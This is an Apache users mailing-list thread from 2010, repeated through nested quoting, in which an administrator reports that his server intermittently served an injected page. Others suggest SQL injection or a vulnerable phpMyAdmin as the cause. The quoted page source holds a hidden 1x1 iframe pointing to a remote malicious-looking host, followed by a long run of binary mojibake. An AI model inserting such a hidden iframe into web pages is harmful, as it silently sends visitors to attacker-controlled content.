>>>> ╣°їхЫ╫╟$шДсЗ┴q Ю\ЭР Ю^Э╜!¤nП\i*
>>>>
>>>> ╖\I*┬Ё╒█А k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6 ОЖО▀M*д9lAщяээ ГГгн√╙"╤╛аr|
>>>> 0┘ G й= г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞*
>>>> MЮeJ█n ║Б)│ФрР √Ьєщa +iЩ┤ ;╧X@№╙a`┘Н
>>>> qр Й'T f s;ъ<псHЪ▓├@лHYS ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦ ╦ни╩ўю╫ЛЛє╦л
>>>> JЪ█Й╥ ╥ I╩%7░К █o
>>>>
>>>> HШЙ5╧p}+г
>>>> I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟ ∙lБ\B:e y
>>>> ├т ; Ч╫▐,B ! ╘2 .═" ╤) ╓]° ═─a`@Y6╬-┴ЎАа └
>>>> ж└1╝щ m ╙BIЮ└Щ╟':еEk@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm │.&cчВЩ cАqЧ
>>>> bSyь┬SPХ─=├д R├ пD▌ ЖЕ o
>>>>
>>>> #Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤
>>>> \Є╤l№ 4#·У'C.3┤ аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с ·~
>>>> FZ∙d�0KJ.ю bE╔йь╜┼g ь8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ ii(░8
>>>> Н3%┴ГCTE кЖx─t╫o H щ█Ж!- Ф^ A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚
>>>> ╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|xЯп┼ВяI2`╜╜┴nowў┘(┌┘▐щя$╔^ э
>>>> ╢√╔ВK бЖ!┌╣є8Ёз║WYХбS ┼Ё█я ▀pеqз ЄtьГPлЫє0ъО∙ha :"V сг╞i ╖Z@
>>>> Yў■ЕY,Р`- FE4Юa. ё Жv0и Ї ^ЎdTуц┬A╬>t╨╡┘ ЩМ╩г╙є│W }ё+▓ fUXЗўs -wвR
>>>> F░∙Н╕5▐d ░Ч╛▒
>>>>
>>>>
>>>> ~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█ ╣н┌Г■{ х?ъ
>>>> uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx 1°/л1xQщ╕
>>>> ╝вУжEФ,".`н╞г\║нмa E'YЇоЫ╚▐
>>>> .Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║ -д╚Ъ,i╔ТvЭ ¤╡"H пч¤Ў№°
>>>> L╖W0Нsc┴ u R%ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖ YR∙<} █ ю О╕д╥-q
>>>> ╖_╩╬{2Yхц╕╔ ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП
>>>>
>>>> wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~ o╗╣ЫФа &28
>>>> ^╫@O}у:╨f -AпеЪ ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═ 5 1▄ И Яєцц| ─w▄oя
>>>> 4унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa
>>>> ╙v*чї8x~vётэow+v╨\ П ╥dJ! │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢
>>>> r┼м1С4Н8<╗kaЁ█CЄїЧП═╫гGцы╤▌∙·"O Ч╤ │ї R_√YР.& | ПжtXОH°┤╤¤ЖНАD▄┘Й ю╕r
>>>> ¤
>>>>
>>>> KV$Ч ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦ > Ж ?> ы'ci
>>>> в╫i�ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN +бЇ>∙бч~ И;ўL
>>>> Oь>Сp╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш fa,VWэДZWА¤ЬГ.эЬ°]Х
>>>> ▄щсМ├
>>>>
>>>> би╝9сй+╬B A& ╔-ЧnдUX▒uu вF В )Odф
>>>> с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш ╪┤L
>>>> SАД( │БD.GF <http://d.gf/>Ц╟╫мм&╗Z3NvJ╣p шh╖w┬] ╦
>>>>
>>>> С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└-
>>>>
>>>> *X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q K#К3Fб:╚·1 З ёqо]П█rА n:▀А╨
>>>> Ы╔Е;Лz╦0╕╩5С╤Д╤R╜ Ыr
>>>>
>>>> ┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨ х ■ У |ЇY8°y╖zЇ─@$D s№▒йb▒ж1Гпс│╦АPq_∙Ун8q ╒j
>>>> ╒╢B║ ╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═Q├╛@Ё╘ └Ю"ЛН┼LxЦA╪е╞н цмВY
>>>> ёJф╢ЪЇ╓ ▒╥с╛°мщЄц╥╗>nG~CH(d"╒ГcЛР夹a ▓▐ 69╖ АoX;wц ыlэ╡s YИLШ@
>>>> ╗ √C Zь р"°ЄБPcЧa)gУeхд4NH┐ /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪ ф5X р
>>>> 6<ч▒┼�Ъ$╨т╥▒ИСЄ╥ №u╞aМtЄХ^ЁW?Kў╖2 ймУр╓4Р E
>>>>
>>>> ==================
>>>> The address indicated in the begining of the page code leads to some
>>>> chinese
>>>> server.
>>>> So, somehow it happened that the output of the apache server was
>>>> substituted
>>>> by this page, which redirected visitors to some chinese server.
>>>>
>>>> But the most strange thing was that the problem dissapeared itself! So,
>>>> it
>>>> last for 10 minutes then disappeared! And the again started and again
>>>> dissapeared. Finally, I turned down apache untill I understand what is
>>>> going
>>>> on...
>>>>
>>>> Any idea how could that happen? How to reproduce this? How to prevent?
>>>> Where to look for logs? I have check both ssh logs and apache logs,
>>>> there
>>>> is
>>>> nothing that could seem unusual there...
>>>>
>>>> Any help is appreciated.
>>>> Oleg.
>>>>
>>>>
>>>> Oleg,
>>>
>>> Are you running any sort of MySQL Database on this machine, and if so is
>>> it
>>> patched and fully updated along with any php scripts. What you are
>>> showing
>>> us is indicative of a SQL Injection Attack.
>>>
>>> Shocked no one has mentioned especially with the rampant incline of the
>>> Russian Business Network to spread its malware through the use of SQL
>>> Injection on any vulnerable website.
>>>
>>> Thanks,
>>> Daniel
>>>
>>> ---------------------------------------------------------------------
>>> The official User-To-User support forum of the Apache HTTP Server
>>> Project.
>>> See <URL:http://httpd.apache.org/userslist.html> for more info.
>>> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>>> " from the digest: users-digest-unsubscribe@httpd.apache.org
>>> For additional commands, e-mail: users-help@httpd.apache.org
>>>
>>>
>>>
>>
> Oleg,
>
> Its not a vulnerability with MySQL it is a vulnerable PHP Script such as an
> outdated PHPMyAdmin or PHPMyAdmin itself. I hardly run it on my servers. I
> would promptly disable it.
>
>
> Thanks,
> Daniel
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>
Re: [users@httpd] Someone hacked my apache2 server
Posted by Daniel Reinhardt <cr...@cryptodan.net>.
--------------------------------------------------
From: "Oleg Goryunov" <ol...@gmail.com>
Sent: 04 April, 2010 13:39
To: <us...@httpd.apache.org>
Subject: Re: [users@httpd] Someone hacked my apache2 server
> Yes, there is a MySQL server. And actually, I noticed that - while the
> server was returning the mentioned hacked page, mysql process was on top of
> the list of the "top" command. Though, it took only 1.5% of the CPU.
> But, mysql is restricted to accept connections from outside world. It only
> listens on local socket.
> What kind of vulnarability does mysql have? Do you know where I can read
> about it?
> Oleg.
>
> On Sun, Apr 4, 2010 at 4:55 PM, Daniel Reinhardt
> <cr...@cryptodan.net>wrote:
>
>>
>> --------------------------------------------------
>> From: "Oleg Goryunov" <ol...@gmail.com>
>> Sent: 03 April, 2010 21:03
>> To: <us...@httpd.apache.org>
>> Subject: [users@httpd] Someone hacked my apache2 server
>>
>> Hello all,
>>> It looks like someone hacked my apache2 server and I am trying to
>>> understand
>>> how this could have happened.
>>> This is what happened:
>>> All of a sudden the server - in response to a web-browser request for a
>>> page
>>> - started to give a full screen of unknown characters (looked like a long
>>> text with encoding mismatch).
>>> The output was immediate and the same for all the web-sites located on the
>>> server.
>>> Looking at the page source of the output I see the following:
>>> =========
>>>
>>> <iframe src= http://azsxde55.9966.org:8800/ak47/29.html width=1
>>> height=1></iframe> Л ������ э[сn█8 ■▌�√ \-░{ ╘Ц '█&q ┤I
>>> щ]╙ф╥l{√ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь З╩Ё√Уєул▀.^СЙM
>>> ╣°їхЫ╫╟$шДсЗ┴q Ю\ЭР Ю^Э╜!¤nП\i*
>>>
>>> ╖\I*┬Ё╒█А k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6 ОЖО▀M*д9lAщяээ ГГгн√╙"╤╛аr|
>>> 0┘ G й= г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞*
>>> MЮeJ█n ║Б)│ФрР √Ьєщa +iЩ┤ ;╧X@№╙a`┘Н
>>> qр Й'T f s;ъ<псHЪ▓├@лHYS ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦ ╦ни╩ўю╫ЛЛє╦л
>>> JЪ█Й╥ ╥ I╩%7░К █o
>>>
>>> HШЙ5╧p}+г
>>> I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟ ∙lБ\B:e y
>>> ├т ; Ч╫▐,B ! ╘2 .═" ╤) ╓]° ═─a`@Y6╬-┴ЎАа └
>>> ж└1╝щ m ╙BIЮ└Щ╟':еEk@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm │.&cчВЩ cАqЧ
>>> bSyь┬SPХ─=├д R├ пD▌ ЖЕ o
>>>
>>> #Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤
>>> \Є╤l№ 4#·У'C.3┤ аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с ·~
>>> FZ∙d�0KJ.ю bE╔йь╜┼g ь8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ ii(░8
>>> Н3%┴ГCTE кЖx─t╫o H щ█Ж!- Ф^ A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚
>>> ╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|xЯп┼ВяI2`╜╜┴nowў┘(┌┘▐щя$╔^ э
>>> ╢√╔ВK бЖ!┌╣є8Ёз║WYХбS ┼Ё█я ▀pеqз ЄtьГPлЫє0ъО∙ha :"V сг╞i ╖Z@
>>> Yў■ЕY,Р`- FE4Юa. ё Жv0и Ї ^ЎdTуц┬A╬>t╨╡┘ ЩМ╩г╙є│W }ё+▓ fUXЗўs -wвR
>>> F░∙Н╕5▐d ░Ч╛▒
>>>
>>>
>>> ~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█ ╣н┌Г■{ х?ъ
>>> uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx 1°/л1xQщ╕
>>> ╝вУжEФ,".`н╞г\║нмa E'YЇоЫ╚▐
>>> .Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║ -д╚Ъ,i╔ТvЭ ¤╡"H пч¤Ў№°
>>> L╖W0Нsc┴ u R%ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖ YR∙<} █ ю О╕д╥-q
>>> ╖_╩╬{2Yхц╕╔ ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП
>>>
>>> wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~ o╗╣ЫФа &28
>>> ^╫@O}у:╨f -AпеЪ ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═ 5 1▄ И Яєцц| ─w▄oя
>>> 4унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa
>>> ╙v*чї8x~vётэow+v╨\ П ╥dJ! │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢
>>> r┼м1С4Н8<╗kaЁ█CЄїЧП═╫гGцы╤▌∙·"O Ч╤ │ї R_√YР.& | ПжtXОH°┤╤¤ЖНАD▄┘Й ю╕r
>>> ¤
>>>
>>> KV$Ч ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦ > Ж ?> ы'ci
>>> в╫i�ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN +бЇ>∙бч~ И;ўL
>>> Oь>Сp╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш fa,VWэДZWА¤ЬГ.эЬ°]Х
>>> ▄щсМ├
>>>
>>> би╝9сй+╬B A& ╔-ЧnдUX▒uu вF В )Odф
>>> с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш ╪┤L
>>> SАД( │БD.GF <http://d.gf/>Ц╟╫мм&╗Z3NvJ╣p шh╖w┬] ╦
>>>
>>> С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└-
>>>
>>> *X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q K#К3Fб:╚·1 З ёqо]П█rА n:▀А╨
>>> Ы╔Е;Лz╦0╕╩5С╤Д╤R╜ Ыr
>>>
>>> ┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨ х ■ У |ЇY8°y╖zЇ─@$D s№▒йb▒ж1Гпс│╦АPq_∙Ун8q ╒j
>>> ╒╢B║ ╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═Q├╛@Ё╘ └Ю"ЛН┼LxЦA╪е╞н цмВY
>>> ёJф╢ЪЇ╓ ▒╥с╛°мщЄц╥╗>nG~CH(d"╒ГcЛР夹a ▓▐ 69╖ АoX;wц ыlэ╡s YИLШ@
>>> ╗ √C Zь р"°ЄБPcЧa)gУeхд4NH┐ /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪ ф5X р
>>> 6<ч▒┼�Ъ$╨т╥▒ИСЄ╥ №u╞aМtЄХ^ЁW?Kў╖2 ймУр╓4Р E
>>>
>>> ==================
>>> The address indicated in the begining of the page code leads to some
>>> chinese
>>> server.
>>> So, somehow it happened that the output of the apache server was
>>> substituted
>>> by this page, which redirected visitors to some chinese server.
>>>
>>> But the most strange thing was that the problem dissapeared itself! So, it
>>> last for 10 minutes then disappeared! And the again started and again
>>> dissapeared. Finally, I turned down apache untill I understand what is
>>> going
>>> on...
>>>
>>> Any idea how could that happen? How to reproduce this? How to prevent?
>>> Where to look for logs? I have check both ssh logs and apache logs, there
>>> is
>>> nothing that could seem unusual there...
>>>
>>> Any help is appreciated.
>>> Oleg.
>>>
>>>
>> Oleg,
>>
>> Are you running any sort of MySQL Database on this machine, and if so is it
>> patched and fully updated along with any php scripts. What you are showing
>> us is indicative of a SQL Injection Attack.
>>
>> Shocked no one has mentioned especially with the rampant incline of the
>> Russian Business Network to spread its malware through the use of SQL
>> Injection on any vulnerable website.
>>
>> Thanks,
>> Daniel
>>
>> ---------------------------------------------------------------------
>> The official User-To-User support forum of the Apache HTTP Server Project.
>> See <URL:http://httpd.apache.org/userslist.html> for more info.
>> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
>> " from the digest: users-digest-unsubscribe@httpd.apache.org
>> For additional commands, e-mail: users-help@httpd.apache.org
>>
>>
>
Oleg,
Its not a vulnerability with MySQL it is a vulnerable PHP Script such as an
outdated PHPMyAdmin or PHPMyAdmin itself. I hardly run it on my servers. I
would promptly disable it.
Thanks,
Daniel
---------------------------------------------------------------------
The official User-To-User support forum of the Apache HTTP Server Project.
See <URL:http://httpd.apache.org/userslist.html> for more info.
To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
" from the digest: users-digest-unsubscribe@httpd.apache.org
For additional commands, e-mail: users-help@httpd.apache.org
Re: [users@httpd] Someone hacked my apache2 server
Posted by Oleg Goryunov <ol...@gmail.com>.
Yes, there is a MySQL server. And actually, I noticed that - while the
server was returning the mentioned hacked page, mysql process was on top of
the list of the "top" command. Though, it took only 1.5% of the CPU.
But, mysql is restricted to accept connections from outside world. It only
listens on local socket.
What kind of vulnarability does mysql have? Do you know where I can read
about it?
Oleg.
On Sun, Apr 4, 2010 at 4:55 PM, Daniel Reinhardt <cr...@cryptodan.net>wrote:
>
> --------------------------------------------------
> From: "Oleg Goryunov" <ol...@gmail.com>
> Sent: 03 April, 2010 21:03
> To: <us...@httpd.apache.org>
> Subject: [users@httpd] Someone hacked my apache2 server
>
> Hello all,
>> It looks like someone hacked my apache2 server and I am trying to
>> understand
>> how this could have happened.
>> This is what happened:
>> All of a sudden the server - in response to a web-browser request for a
>> page
>> - started to give a full screen of unknown characters (looked like a long
>> text with encoding mismatch).
>> The output was immediate and the same for all the web-sites located on the
>> server.
>> Looking at the page source of the output I see the following:
>> =========
>>
>> <iframe src= http://azsxde55.9966.org:8800/ak47/29.html width=1
>> height=1></iframe> Л ������ э[сn█8 ■▌�√ \-░{ ╘Ц '█&q ┤I
>> щ]╙ф╥l{√ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь З╩Ё√Уєул▀.^СЙM
>> ╣°їхЫ╫╟$шДсЗ┴q Ю\ЭР Ю^Э╜!¤nП\i*
>>
>> ╖\I*┬Ё╒█А k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6 ОЖО▀M*д9lAщяээ ГГгн√╙"╤╛аr|
>> 0┘ G й= г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞*
>> MЮeJ█n ║Б)│ФрР √Ьєщa +iЩ┤ ;╧X@№╙a`┘Н
>> qр Й'T f s;ъ<псHЪ▓├@лHYS ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦ ╦ни╩ўю╫ЛЛє╦л
>> JЪ█Й╥ ╥ I╩%7░К █o
>>
>> HШЙ5╧p}+г
>> I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟ ∙lБ\B:e y
>> ├т ; Ч╫▐,B ! ╘2 .═" ╤) ╓]° ═─a`@Y6╬-┴ЎАа └
>> ж└1╝щ m ╙BIЮ└Щ╟':еEk@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm │.&cчВЩ cАqЧ
>> bSyь┬SPХ─=├д R├ пD▌ ЖЕ o
>>
>> #Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤
>> \Є╤l№ 4#·У'C.3┤ аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с ·~
>> FZ∙d�0KJ.ю bE╔йь╜┼g ь8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ ii(░8
>> Н3%┴ГCTE кЖx─t╫o H щ█Ж!- Ф^ A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚
>> ╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|xЯп┼ВяI2`╜╜┴nowў┘(┌┘▐щя$╔^ э
>> ╢√╔ВK бЖ!┌╣є8Ёз║WYХбS ┼Ё█я ▀pеqз ЄtьГPлЫє0ъО∙ha :"V сг╞i ╖Z@
>> Yў■ЕY,Р`- FE4Юa. ё Жv0и Ї ^ЎdTуц┬A╬>t╨╡┘ ЩМ╩г╙є│W }ё+▓ fUXЗўs -wвR
>> F░∙Н╕5▐d ░Ч╛▒
>>
>>
>> ~ ёY вТ аY tlkачоЭ`√-▄ ┼mсЁ╠ .█ ╣н┌Г■{ х?ъ
>> uю4d═┤JЄ╕.т╒щ+rqy~Єыё╒▌║▄m ╣Ь* 35ez╩a▒крпх{ь#eч:х>_┴Гъx 1°/л1xQщ╕
>> ╝вУжEФ,".`н╞г\║нмa E'YЇоЫ╚▐
>> .Zх А:эl.Л▐{│┘юн`уRЭ ─Ь °K╩t╠йш$hH │╖║ -д╚Ъ,i╔ТvЭ ¤╡"H пч¤Ў№°
>> L╖W0Нsc┴ u R%ъ4╪Yf├5╬╟ЮТ,(+yє:ЎГ ь%│░щ]wR%1ё┬Е.r╞ ы╖ YR∙<} █ ю О╕д╥-q
>> ╖_╩╬{2Yхц╕╔ ┴┤щрБA+Q╖▄▓Ч°▐{З╗чП
>>
>> wШA┼╣╓ю4Rўs╠Fз╠╣{╙ k╔йч░8╛▄ ■╢ЫБ├#ЕнБя№~ o╗╣ЫФа &28
>> ^╫@O}у:╨f -AпеЪ ЦМ Ю┘k╚ пЎ▄{щ·╜/╖UїЫq$aйк╔xЄъь|═ 5 1▄ И Яєцц| ─w▄oя
>> 4унc�╟?╞dLM#гx╖l┐┐J╖┐аJЫa
>> ╙v*чї8x~vётэow+v╨\ П ╥dJ! │·╠_,Ъ╫Шъа ╚KрФ Г ь*ъY╤╢
>> r┼м1С4Н8<╗kaЁ█CЄїЧП═╫гGцы╤▌∙·"O Ч╤ │ї R_√YР.& | ПжtXОH°┤╤¤ЖНАD▄┘Й ю╕r
>> ¤
>>
>> KV$Ч ╙ШлWН'8z▒Р█ Жk╛YEx├хupDBRгИ4гIмє42p$╢У ЭГ ї¤f╦ > Ж ?> ы'ci
>> в╫i�ЙйМaщ ~ЖV ТMЁ0╩╟╥┘ **єA╞ У░ #mgDS.ц√ vо 2бзX"Ь╥ГаN +бЇ>∙бч~ И;ўL
>> Oь>Сp╚етА8<мГьУ■ ╗ Мяnё|<╨д_У█w?╧ь:Y ∙l-Л иSF╡Ш fa,VWэДZWА¤ЬГ.эЬ°]Х
>> ▄щсМ├
>>
>> би╝9сй+╬B A& ╔-ЧnдUX▒uu вF В )Odф
>> с b6Щ ХkByКПV!╔Ф'╠!D░UСLA ─Х/%Аїч(d╠║Лx6щ;ЭЧкHй s╣OznЖ├HУЁш ╪┤L
>> SАД( │БD.GF <http://d.gf/>Ц╟╫мм&╗Z3NvJ╣p шh╖w┬] ╦
>>
>> С▌┴№┐ iяяАm 4─7шbеzq║hКФЕ┤╜N&└-
>>
>> *X;TуМСDэ{.╣X╟жКY╓р nbgl╦═E│$S У═Зр q K#К3Fб:╚·1 З ёqо]П█rА n:▀А╨
>> Ы╔Е;Лz╦0╕╩5С╤Д╤R╜ Ыr
>>
>> ┐Яyy4│ ┬>╚ЁН)╟{ЕЩ(х4╘╨ х ■ У |ЇY8°y╖zЇ─@$D s№▒йb▒ж1Гпс│╦АPq_∙Ун8q ╒j
>> ╒╢B║ ╡ь< ╪э*ЫГБe ЕkT|└э -Ў�┴Z ╝╫╠▄= 4═Q├╛@Ё╘ └Ю"ЛН┼LxЦA╪е╞н цмВY
>> ёJф╢ЪЇ╓ ▒╥с╛°мщЄц╥╗>nG~CH(d"╒ГcЛР夹a ▓▐ 69╖ АoX;wц ыlэ╡s YИLШ@
>> ╗ √C Zь р"°ЄБPcЧa)gУeхд4NH┐ /═!cСДеР┤ й╔гФCъ .9+єЫ┐╪ ф5X р
>> 6<ч▒┼�Ъ$╨т╥▒ИСЄ╥ №u╞aМtЄХ^ЁW?Kў╖2 ймУр╓4Р E
>>
>> ==================
>> The address indicated in the begining of the page code leads to some
>> chinese
>> server.
>> So, somehow it happened that the output of the apache server was
>> substituted
>> by this page, which redirected visitors to some chinese server.
>>
>> But the most strange thing was that the problem dissapeared itself! So, it
>> last for 10 minutes then disappeared! And the again started and again
>> dissapeared. Finally, I turned down apache untill I understand what is
>> going
>> on...
>>
>> Any idea how could that happen? How to reproduce this? How to prevent?
>> Where to look for logs? I have check both ssh logs and apache logs, there
>> is
>> nothing that could seem unusual there...
>>
>> Any help is appreciated.
>> Oleg.
>>
>>
> Oleg,
>
> Are you running any sort of MySQL Database on this machine, and if so is it
> patched and fully updated along with any php scripts. What you are showing
> us is indicative of a SQL Injection Attack.
>
> Shocked no one has mentioned especially with the rampant incline of the
> Russian Business Network to spread its malware through the use of SQL
> Injection on any vulnerable website.
>
> Thanks,
> Daniel
>
> ---------------------------------------------------------------------
> The official User-To-User support forum of the Apache HTTP Server Project.
> See <URL:http://httpd.apache.org/userslist.html> for more info.
> To unsubscribe, e-mail: users-unsubscribe@httpd.apache.org
> " from the digest: users-digest-unsubscribe@httpd.apache.org
> For additional commands, e-mail: users-help@httpd.apache.org
>
>
Re: [users@httpd] Someone hacked my apache2 server
Posted by Daniel Reinhardt <cr...@cryptodan.net>.
--------------------------------------------------
From: "Oleg Goryunov" <ol...@gmail.com>
Sent: 03 April, 2010 21:03
To: <us...@httpd.apache.org>
Subject: [users@httpd] Someone hacked my apache2 server
> Hello all,
> It looks like someone hacked my apache2 server and I am trying to understand
> how this could have happened.
> This is what happened:
> All of a sudden the server - in response to a web-browser request for a page
> - started to give a full screen of unknown characters (looked like a long
> text with encoding mismatch).
> The output was immediate and the same for all the web-sites located on the
> server.
> Looking at the page source of the output I see the following:
> =========
>
> <iframe src= http://azsxde55.9966.org:8800/ak47/29.html width=1
> height=1></iframe> Л ������ э[сn█8 ■▌�√ \-░{ ╘Ц '█&q ┤I
> щ]╙ф╥l{√ла$┌fCС*I┘ёс цЮхЮьf(╩Ц 9N▓-о╗pА─ 9№f8Ь З╩Ё√Уєул▀.^СЙM
> ╣°їхЫ╫╟$шДсЗ┴q Ю\ЭР Ю^Э╜!¤nП\i*
>
> ╖\I*┬Ё╒█А k│¤0Ь═f▌┘алЇ8╝║ o лПГ¤╫ОнМь&6 ОЖО▀M*д9lAщяээ ГГгн√╙"╤╛аr|
> 0┘ G й= г╔╤ !├И F&ЪН РТ═║TP═НаСщ╞*
> MЮeJ█n ║Б)│ФрР √Ьєщa +iЩ┤ ;╧X@№╙a`┘Н
> qр Й'T f s;ъ<псHЪ▓├@лHYS ╦e┬nЮТС B═Z \│∙Lщд:фУRйаO╔▀▄g╦ ╦ни╩ўю╫ЛЛє╦л
> JЪ█Й╥ ╥ I╩%7░К █o
>
> HШЙ5╧p}+г
> I╛' b'М$sах1A}RAШ s╔ ХI9АдT╥1KёлЩ ╦╥ Nc&ЩЧт Я~w xЭgLТw*╫1#╟ ∙lБ\B:e y
> ├т ; Ч╫▐,B ! ╘2 .═" ╤) ╓]° ═─a`@Y6╬-┴ЎАа └
> ж└1╝щ m ╙BIЮ└Щ╟':еEk@МОБg╩ N├b■с' жJYеДщ~2р4aA№h┤Ш║EjАm │.&cчВЩ cАqЧ
> bSyь┬SPХ─=├д R├ пD▌ ЖЕ o
>
> #Х╠Б═╔ыў$ ╘@|H)ЧA╜)7LЯ1Щг9@/╙╨ d8R:%4F}А,L6Ь МnвТ├ S $.мO(0┌Аph╞╤
> \Є╤l№ 4#·У'C.3┤ аMU"╞Є#КБ8╒9Х╚╦>ПхFGъ& T╪j┐с ·~
> FZ∙d�0KJ.ю bE╔йь╜┼g ь8.╟нтг┴г╥ ┤щ9MxТ0YЄYЎ▐т4е" К93Ю╫ез%gмdЗ ii(░8
> Н3%┴ГCTE кЖx─t╫o H щ█Ж!- Ф^ A┘#А╕ tI9kЗ▒UN║m~╩З;? Аv \╚
> ╟8K═їbФ7а5C4│╣^▓z3x█ПO_Nc∙ПЬЮ^┌шd╧№ЎaW^|xЯп┼ВяI2`╜╜┴nowў┘(┌┘▐щя$╔^ э
> ╢√╔ВK бЖ!┌╣є8Ёз║WYХбS ┼Ё█я ▀pеqз ЄtьГPлЫє0ъО∙ha :"V сг╞i ╖Z@
> Yў■ЕY,Р`- FE4Юa. ё Жv0и Ї ^ЎdTуц┬A╬>t╨╡┘ ЩМ╩г╙є│W }ё+▓ fUXЗўs -wвR
> F░∙Н╕5▐d ░Ч╛▒
>
>
